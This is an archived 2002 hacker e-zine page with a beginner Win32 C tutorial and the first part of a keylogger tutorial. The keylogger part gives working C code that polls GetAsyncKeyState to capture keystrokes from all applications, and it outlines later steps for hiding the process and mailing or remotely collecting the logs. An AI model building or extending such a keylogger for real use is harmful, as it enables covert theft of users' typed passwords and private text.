The Hitchhiker's World Issue 2: Notes on Win32 programming, Keylogger in an API (Part #1).
b14b00ecbe106388135e2485324abe441bf8fb645734512698128c6f86ff1040<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta name="keywords" content="hitchhiker, security magazine, security holes, exploit, buffer overflow, vulnerability, security writers, malware, virus, trojan, security writers">
<meta name="description" content="The HH's World features mostly network-security articles/programs along with a touch of personal expression. Entries & comments are welcomed.">
<META NAME="AUTHOR" CONTENT="Arun Koshy">
<title>Securitywriters.org - Hitchhiker's World - Zine #</title>
<link rel="stylesheet" type="text/css" href="libstyle.css">
</head>
<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="120">
<tr>
<td width="100%" height="43" align="center" class="bluelink">
<p class="title">The Hitchhiker's World <br>
Issue #2</p>
</td>
</tr>
<tr>
<td width="100%" height="19">
<div align="center">
<p><b>Soli Deo gloria - To God alone be glory</b></p>
</div>
</td>
</tr>
<tr>
<td width="100%" height="19">
<p>Released : 28th March' 2002</p>
</td>
</tr>
<tr>
<td width="100%" height="19">
<p>Editor : <a href="mailto:hwcol@arunkoshy.cjb.net">Arun Koshy</a></p>
</td>
</tr>
<tr>
<td width="100%" height="19">
<p>Contributors : <a href="mailto:root@ayanthegreat.cjb.net">Ayan Chakrabarti</a></p>
</td>
</tr>
</table>
<p><B>DISCLAIMER :</B> [Insert the biggest, most comprehensive lawyerspeak here].
<B>Securitywriters.org (SWG) or the author(s) are NOT RESPONSIBLE for anything</B>
that happens to you, ur cat, dog, sexlife or wife after you go through the information
presented below. Enjoy.</P>
<p><br>
Contents<BR>
<BR>
</P>
<UL>
<LI><A
href="#ART1">Notes on Windows Programming</A><BR>
<br>
{ Notes : <font face="Arial, Helvetica, sans-serif" size="2">A launch pad
for Win32, would deviate in the future to lot of grey topics :-)</font> }<br>
{ Contrib : Hitchhiker } <BR>
</LI>
</UL>
<UL>
<LI>
<P ><A
href="#ART2">Advanced Meal</A><BR>
<br>
{ Notes : <font face="Arial, Helvetica, sans-serif" size="2">Case Study
- A keylogger in an API }</font><br>
{ Contrib : Ayan Chakrabarti }<BR>
</P>
</LI>
</UL>
<hr>
<P > <A name=EDIT></A><span class="text_head1">Editorial</span> </P>
<P ><font face="Arial, Helvetica, sans-serif" size="2"><b>[March]</b></font><br>
</P>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">I had been
thinking on how to keep myself sane during these times. Usually when u feel
that lot of things are out of your control, you should just concentrate on things
which you can change. I've decided to start this column after seeing how it
will help me keep my own perspective on things. </font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Generally this
would be a more suitable format for me to contribute, as it will feature weekly
or at the max monthly updates on whatever new thing I play around with. It would
also get me a chance to learn from the great people who have become my friends
and gurus :).</font></p>
<P ><span class="text_head1">Contribute! Learn! Discuss!</span><BR>
<BR>
<span class="text_head2">Contact:</span><BR>
You're invited to send in your entries, comments et.al for publication to <A
href="mailto:hwcol@arunkoshy.cjb.net">hwcol@arunkoshy.cjb.net</A> </P>
<P><span class="text_head2">Hot Topics (but definitely not restricted to):</span><BR>
algorithms, stuff related to systems programming and applied network security.</P>
<P><span class="text_head2">Style:</span><BR>
SWG advocates a "hands-on" approach .. Get to the code or point. Provide references
and links if necessary (especially if you're presenting a fresh perspective
on something already known).
<P>
<hr>
<p> <A name=#ART1></A><span class="text_head1">Notes on Windows Programming<br>
</span><a href="http://www.arunkoshy.cjb.net" target="_blank">By Arun Darlie
Koshy</a>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Over the past
few months, I've been glad to notice people asking questions about assemblers,
systems level programming.We love to talk about how systems utilities, malware
and "elite" programs are written or how they affect our lives. But
a few people wish to move beyond the buzz and do their own thing. <br>
<br>
This is my small coin in the pot. First of all let's get our tools. I assume
you're broke like me and don't want to buy anything even when developing for
Windoze. </font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Incase you
do have money, It would be excellent if you get a copy of Charles Petzold's
Programming Windows (5th Ed), I had brought the book and it also had an electronic
version on the CD. I would have put it up for download but then it feels like
you're disrespecting a good teacher. Someone should request to Mr.Charles to
release it free for people or you can find a friend who has the book.</font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Here's what
we need :</font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2"><b>Our C/C++
Tool</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://www.borland.com/bcppbuilder/freecompiler/" target="_blank">http://www.borland.com/bcppbuilder/freecompiler/</a></font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"><b>Some docs to help you
out with the install :</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://community.borland.com/article/0,1410,21205,00.html" target="_blank">http://community.borland.com/article/0,1410,21205,00.html</a></font></li>
</ul>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://www.pharo.onlinehome.de/Bcc55.html" target="_blank">http://www.pharo.onlinehome.de/Bcc55.html</a></font></li>
</ul>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2"><b>Assembler</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://www.win32asm.cjb.net" target="_blank">http://www.win32asm.cjb.net</a>
(Make sure you download Iczelion's tutorials, the MASM pack)</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"> Let's now start with a
simple hello world program for Windows :</font></p>
<p><br>
<span class="code">/* Hello.c - the nth version in the history of humankind
*/</span></p>
<p class="code">#include <windows.h></p>
<p class="code">int WINAPI WinMain ()</p>
<p class="code">{<br>
MessageBox(NULL,"War Sucks","This is my message..",MB_OK);<br>
return 0;<br>
}</p>
<p><font face="Arial, Helvetica, sans-serif" size="2"><br>
This looks as simple as the K&R example. Build it by "bcc32 -tW -5
hello.c". Let's now take it apart :</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">1. windows.h - you can think
of this as a master include file, something like ur stdio.h</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">2. WinMain() is the windows
equivalent of main() and it also has some parameters which need to be passed
(like argc,argv)<br>
but we won't deal with it till we learn more.</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">3. WINAPI ia a directive
to the compiler. Fire up your bcc55\include\windef.h and search for the string
"WINAPI" .. it throws up the following (important) matches :</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">#define APIENTRY WINAPI<br>
#define WINAPI __stdcall</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">Basically __stdcall is a
type of "calling convention" and is most widely used for Win32 API
functions. To understand the whole story, we would need to dip a bit into the
program's equivalent assembler code .. at present, just keep the following in
ur mind :</font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"> APIENTRY and WINAPI
mean the same thing<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">arguments are passed
from right to left (eg. foo(int x, int y) -> y would be put in stack first,
then x)<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">the called function is
reponsible for its own stack (i.e it pops its own arguments, balances the
SP)</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"><b>Refer and read</b><i>
</i><b>:</b><i> <br>
</i></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2"><i>Iczelion's "Tutorial
1 : The Basics" (you should have downloaded the tutes by now!)<br>
<br>
</i></font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2"><a href="http://www.codeproject.com/useritems/calling_conventions_demystified.asp" target="_blank"><i>Calling
conventions demystified by Nemanja Trifunovic</i></a></font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2">4.<i> </i>The MessageBox()
API .. now we come to the meat of the program .. our printf() equivalent in
this world.. check your MSDN documentation or <a href="http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/dlgboxes_76bc.asp" target="_blank">this
link</a> </font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">From that we understand
that we are making a "MessageBox" component with NULL as its hWnd,
"War Sucks" (a string) as the text in the messagebox and "This
is my message.." as the caption, and "MB_OK" (defined in the
headers) so that the<br>
box gets it's "OK" button. The rest of the program should be self-explanatory.</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">While in the Win32 world,
get ready to <b>deal with :</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">a ton of baggage/conventions</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">many interesting "features"</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">you can see OOP in action</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">many unheard constructs,
language features which are never used in the commandline world are applied</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">you need to understand
the architecture and concepts like how the OS "messages" your program</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"><b>Tips</b></font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">Always have MSDN with
you for ready reference</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2"> check the header files
for more details</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2">You may require to refresh
your concepts about pointers to functions, here's a small program to help you
</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2"><span class="code">#include
<iostream.h></span></font></p>
<p class="code"><font face="Arial, Helvetica, sans-serif" size="2">void xi(void)<br>
{<br>
cout << "\nI am the function which is pointed to :-)";<br>
}</font></p>
<p class="code"><font face="Arial, Helvetica, sans-serif" size="2">void main()<br>
{<br>
void (*xir) (void); //if
it's void * xir , the precedence would casue a problem hence the brackets<br>
xir=xi;
//the address can be simply found
by referering without the (), just like an array's address <br>
xir();<br>
}</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">The use of these become
clear when you deal with stuff like WNDCLASS. This is also a good time to a
quick refresh of your C basics. We've only started .. watch this space.</font></p>
<hr>
<P ><A
name=#ART2></A><span class="text_head1">Advanced Meal - A keylogger in an API<br>
</span><a
href="http://ayanthegreat.cjb.net" target=_blank>By Ayan Chakrabarti</a></P>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Many people
are curious to learn about how a keylogger works. Here's Ayan trying to explain
:</font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">During the
MS-DOS era, making a keylogger involved serious low-level programming. We had
to hook the keyboard device interrupt, redirect it to our own handler, log each
key and finally call the original handler. The official way to log keystrokes
in windows is something similar, involving system wide hooks and what not. </font></p>
<p align="left"><font face="Arial, Helvetica, sans-serif" size="2">Thanks to our
friends at Redmond, there's an easier way - a much easier way... infact amazing</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">Enter the GetAsyncKeyState
API. It's is a pretty useful function as far as keyloggers are concerned (infact,
its difficult to imagine what other possible use it could have). Simply put,
you pass a keycode and it'll return whether that key has been pressed since
the last call to the function. </font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">Yup, that's right. With
this function you can keep track of any key pressed in any application running
on the system. Ok, enough theory. Lets take a look at the anatomy of a keylogger
and how this project will evolve : </font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">continously keep calling
GetAsyncKeyState with all different keycodes to keep track of which keys are
pressed. <br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">then store the keystrokes
in a file. <br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">ensure that all this
is done without loss in system performance<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">the keylogger process
should not be visible in the tasklist<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">another good feature
would be to be able to mail the log files or announce a control unit on irc
;-)<br>
</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2"> STEP 1 : Getting to know
the logic and basic feel <br>
<br>
We will start with the basic shell (i.e the first step mentioned in the process)
and I expect you to try and work at it independently. </font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2"><span class="code">#include
<windows.h><br>
#include <stdio.h></span></font></p>
<p><span class="code"><font face="Arial, Helvetica, sans-serif" size="2">unsigned
int nlist[] = { 8,9,12,13,19,20,27,32,33,34,35,36,37,38,39,<br>
40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,<br>
57,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,<br>
81,82,83,84,85,86,87,88,89,90,91,93,96,97,98,99,100,<br>
101,102,103,104,105,106,107,108,109,110,111,112,113,<br>
114,115,116,117,118,119,120,121,122,123,124,125,126,<br>
127,128,129,130,131,132,133,134,135,144,145,186,187,<br>
188,189,190,191,192,219,220,221,222,223,224,225,226,<br>
227,228,230,233,234,235,236,237,238,239,240,241,242,<br>
243,244,245,246,247,248,249,250,251,252,253,254,0};<br>
<br>
void main(void)<br>
{<br>
int i;<br>
<br>
while(1)<br>
{<br>
for(i = 0;nlist[i] != 0;i++)<br>
{<br>
if(GetAsyncKeyState(nlist[i])
== -32767)<br>
break;<br>
}<br>
<br>
if(nlist[i] == 0)<br>
continue;<br>
else<br>
printf("%d
",nlist[i]);<br>
}<br>
}<br>
</font></span><font face="Arial, Helvetica, sans-serif" size="2"> </font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">Save this as "klog.c"
and use "bcc32 kb.c" to generate the EXE. Open up the dos box and
run. Now shift the focus off from the window (i.e select any other window or
part of ur desktop) and type anything .. it should display the codes generated.
This is important because if you type into the klog window, its not going to
be displayed for obvious reasons.</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">You're now staring at the
skeleton of a keylogger :). To exit this program, go and select the DOS box
again and press CTRL+C</font></p>
<p><font face="Arial, Helvetica, sans-serif" size="2">What are we doing here ?
Simple .. </font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">we set up an array of
the codes we want to test, set up an endless loop (this is with exit points
... CTRL+C now and later when we move fully to windows mode, we'll use PeekMessage
to detect for WM_QUIT Events and improving systems performance) <br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">test repeatedly to check
if a key has been pressed .. check the documentation of GetAsyncKeyState to
know why we're checking against "-32767" to break.<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">we can't print 0 control
code (infact if u note the array, we've avoided 0 to 7 as they are system
codes) so continue<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">else print the code</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2">Readers are most welcome
to indulge in serious discussions but please refrain from :</font></p>
<ul>
<li><font face="Arial, Helvetica, sans-serif" size="2">asking stupid questions<br>
<br>
</font></li>
<li><font face="Arial, Helvetica, sans-serif" size="2">requesting the sources
for any of my non-GPL projects (basically if the source's not on my site ..
don't ask me for it).</font></li>
</ul>
<p><font face="Arial, Helvetica, sans-serif" size="2">We'll see more next week
or so .. till then .. study, learn and enjoy.<br>
<br>
PS : You ought to thank Arun for writing such a simple shell and the "step-by-step"
approach. He has protected you from the torture I had planned for you, the reader
;-).</font><font face="Arial, Helvetica, sans-serif" size="2"><br>
</font></p>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<div align="center" class="unnamed1"><span class="footer"><a href="http://www.Infosecwriters.com"><font size="1" face="Arial, Helvetica, sans-serif">Home</font></a><font size="1" face="Arial, Helvetica, sans-serif">
|<a href="http://www.Infosecwriters.com/about.php"> About Us</a> |<a href="http://www.Infosecwriters.com/contact.php">
Contact Us</a> |<a href="http://www.Infosecwriters.com/privacy.php"> Privacy
Policy</a> | <a href="http://www.Infosecwriters.com/map.php">Site Map</a>
</font></span></div>
<p align="center"><font size="1" face="Arial, Helvetica, sans-serif"><span class="footer">All
images, content & text (unless other ownership applies) are © copyrighted
2003, Infosecwriters.com. All rights reserved. Comments are property of
the respective posters.</span></font></p>
</td>
</tr>
</table>
</body>
</html>
</body>
</html>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed